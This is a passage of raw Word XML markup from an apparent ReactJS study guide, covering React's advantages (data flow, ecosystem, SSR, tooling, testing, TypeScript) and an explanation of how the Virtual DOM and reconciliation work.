        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>shouldComponentUpdate</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (in class components) or </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>React.memo</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (in functional components).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619591C2" w14:textId="77777777" w:rsidR="003776E1" w:rsidRPr="003C7C02" w:rsidRDefault="003776E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1. Unidirectional Data Flow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4205A1C8"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React follows </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>unidirectional data flow</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which means that data flows from parent components to child components through props.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1C5B7B"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his makes the application easier to understand and debug.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73EE781D" w14:textId="77777777" w:rsidR="003776E1" w:rsidRPr="003C7C02" w:rsidRDefault="003776E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2. Ecosystem and Community Support</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E82E93F"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act has a large ecosystem with many supporting libraries and tools such as Redux (state management), React Router (routing), Next.js (server-side rendering), and more.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3AE158"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t has an active and extensive community, which leads to a wide range of tutorials, resources, and third-party integrations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E39D13" w14:textId="77777777" w:rsidR="003776E1" w:rsidRPr="003C7C02" w:rsidRDefault="003776E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3. Server-Side Rendering (SSR)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270DACE8"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With tools like </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Next.js</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, React can be used for </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>server-side rendering</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, where the content is rendered on the server before being sent to the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AF134D"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his improves performance, especially for SEO and initial page load speed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218454B4" w14:textId="77777777" w:rsidR="003776E1" w:rsidRPr="003C7C02" w:rsidRDefault="003776E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4. Strong Developer Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB24E29"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React has excellent developer tools such as </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>React Developer Tools</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which provide an easy-to-use interface for inspecting the component hierarchy, props, and state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6D73C2"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t helps in debugging and analyzing the performance of React applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FE8C80" w14:textId="77777777" w:rsidR="003776E1" w:rsidRPr="003C7C02" w:rsidRDefault="003776E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5. Cross-Platform Development</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6460FF16"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act Native extends React to mobile development, allowing you to use React to build mobile applications for iOS and Android.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7826E11B"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act Native shares a similar development experience to React for the web, and allows for the reuse of code across web and mobile applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0696BB27" w14:textId="77777777" w:rsidR="003776E1" w:rsidRPr="003C7C02" w:rsidRDefault="003776E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6. Easy Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9681D6"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act has a simple structure that makes testing easier.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFFD133"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Tools like </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Jest</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (for unit testing) and </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>React Testing Library</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (for component testing) make it easier to write and run tests for React applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10095EEE" w14:textId="77777777" w:rsidR="003776E1" w:rsidRPr="003C7C02" w:rsidRDefault="003776E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7. TypeScript Support</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528B9C4A"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React has first-class </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>TypeScript</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> support, allowing developers to benefit from static typing for props, state, and other parts of the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F795D4"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ypeScript improves developer experience by catching type-related errors early in the development process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453BC2C7" w14:textId="77777777" w:rsidR="003776E1" w:rsidRPr="003C7C02" w:rsidRDefault="003776E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8. Integration with Other Libraries and Frameworks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AC2130"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act can easily integrate with other libraries or frameworks. For example, you can use React with state management libraries like Redux or Zustand, routing libraries like React Router, and CSS-in-JS libraries like styled-components.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06820090" w14:textId="77777777" w:rsidR="003776E1" w:rsidRPr="003C7C02" w:rsidRDefault="003776E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Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445C4AC9" w14:textId="77777777" w:rsidR="003776E1" w:rsidRPr="003C7C02" w:rsidRDefault="003776E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actJS is an extremely flexible and powerful library for building dynamic user interfaces. Its component-based architecture, efficient rendering with the Virtual DOM, and unidirectional data flow are some of the key features that make it popular among developers for building fast, scalable, and maintainable applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB5F339" w14:textId="5E95CB40" w:rsidR="00955143" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00955143">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="22061664">
          <v:rect id="_x0000_i3542" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF984E5" w14:textId="25220F3F" w:rsidR="00F9109D" w:rsidRPr="00CE4B95" w:rsidRDefault="002B263A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="873" w:name="_Toc196308353"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How does Virtual DOM work</w:t>
      </w:r>
      <w:r w:rsidR="00F9109D" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="873"/>
    </w:p>
    <w:p w14:paraId="27F3B705" w14:textId="27E62A6F" w:rsidR="00207321" w:rsidRPr="003C7C02" w:rsidRDefault="00207321" w:rsidP="003C7C02">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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The </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Virtual DOM</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is one of the key concepts that makes React efficient and fast. It serves as a lightweight copy of the real DOM (Document Object Model) that React uses to optimize rendering updates. Here's a step-by-step explanation of how the Virtual DOM works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC1085E" w14:textId="77777777" w:rsidR="00207321"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B80E7E7">
          <v:rect id="_x0000_i3543" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="476AD7EA" w14:textId="77777777" w:rsidR="00207321" w:rsidRPr="003C7C02" w:rsidRDefault="0020732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 What is the Virtual DOM?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E9F6B6"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he Virtual DOM is an in-memory representation of the actual DOM elements. It is a lightweight, JavaScript object that mimics the structure of the real DOM, but it does not directly interact with the browser’s real DOM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72AA81A0"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act uses the Virtual DOM to make changes in the user interface faster and more efficiently by performing calculations and updates in the virtual space first, and then syncing the changes with the actual DOM in an optimal way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123BCB58" w14:textId="77777777" w:rsidR="00207321"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B4D6754">
          <v:rect id="_x0000_i3544" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF497F5" w14:textId="77777777" w:rsidR="00207321" w:rsidRPr="003C7C02" w:rsidRDefault="0020732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2. Steps in Virtual DOM Process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34765331" w14:textId="77777777" w:rsidR="00207321" w:rsidRPr="003C7C02" w:rsidRDefault="0020732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a. Initial Render (First Render)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6259B1"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lastRenderedPageBreak/>
        <w:t>Initial Virtual DOM</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: When a React component is first rendered, React creates a virtual representation of the UI components, which is a </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Virtual DOM tree</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. This tree mirrors the actual DOM structure, but it's a lightweight, in-memory object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A179B70"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Real DOM Update</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: React then compares this Virtual DOM to the </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>real DOM</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and applies the necessary changes to the real DOM (like creating, updating, or deleting elements).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B3041C" w14:textId="77777777" w:rsidR="00207321" w:rsidRPr="003C7C02" w:rsidRDefault="0020732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b. Updating the Virtual DOM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB179A4"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State or Props Change</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: When the state or props of a component change, React re-renders the component and creates a new </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Virtual DOM tree</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for that component.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F946FC0"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Virtual DOM Comparison</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: React then compares the new Virtual DOM with the previous Virtual DOM using an algorithm called </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reconciliation</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C901D85" w14:textId="77777777" w:rsidR="00207321" w:rsidRPr="003C7C02" w:rsidRDefault="00207321"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The algorithm identifies </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>differences</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> between the two Virtual DOM trees (known as </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>diffing</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC9726D" w14:textId="77777777" w:rsidR="00207321" w:rsidRPr="003C7C02" w:rsidRDefault="0020732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c. Reconciliation Process (Diffing Algorithm)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3783DC"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React performs a </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>diffing process</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to detect the changes between the previous Virtual DOM and the new Virtual DOM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CA549B" w14:textId="77777777" w:rsidR="00207321" w:rsidRPr="003C7C02" w:rsidRDefault="00207321"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The diffing algorithm compares the </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>old Virtual DOM</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and the </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>new Virtual DOM</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471C954D" w14:textId="77777777" w:rsidR="00207321" w:rsidRPr="003C7C02" w:rsidRDefault="00207321"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f there are differences, React determines the most efficient way to update the real DOM by applying only the necessary changes, rather than re-rendering everything from scratch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E988064" w14:textId="77777777" w:rsidR="00207321" w:rsidRPr="003C7C02" w:rsidRDefault="0020732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d. Updating the Real DOM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8258DE"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Batching Updates</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Once the changes are detected, React updates the real DOM in a </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>batch</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. This minimizes the number of DOM manipulations, leading to better performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4297FCA3"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Efficient Rendering</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Only the parts of the UI that actually changed are updated. This is much faster than a traditional approach where the entire DOM is re-rendered whenever the state changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC3D7B3" w14:textId="77777777" w:rsidR="00207321"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381D642">
          <v:rect id="_x0000_i3545" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0336C9BE" w14:textId="77777777" w:rsidR="00207321" w:rsidRPr="003C7C02" w:rsidRDefault="0020732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3. Key Benefits of Virtual DOM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E63E16" w14:textId="77777777" w:rsidR="00207321" w:rsidRPr="003C7C02" w:rsidRDefault="0020732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a. Performance Optimization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E8B774"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he Virtual DOM minimizes the number of updates to the real DOM. Since DOM manipulation is expensive in terms of performance, React reduces this by using the Virtual DOM to update only the parts of the UI that need to change.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D27F03"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his improves the overall performance of web applications, especially when there are frequent updates, like in interactive UIs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5F4D77" w14:textId="77777777" w:rsidR="00207321" w:rsidRPr="003C7C02" w:rsidRDefault="0020732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b. Efficient Reconciliation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192B8AA0"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React’s reconciliation process, combined with the Virtual DOM, ensures that only the </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
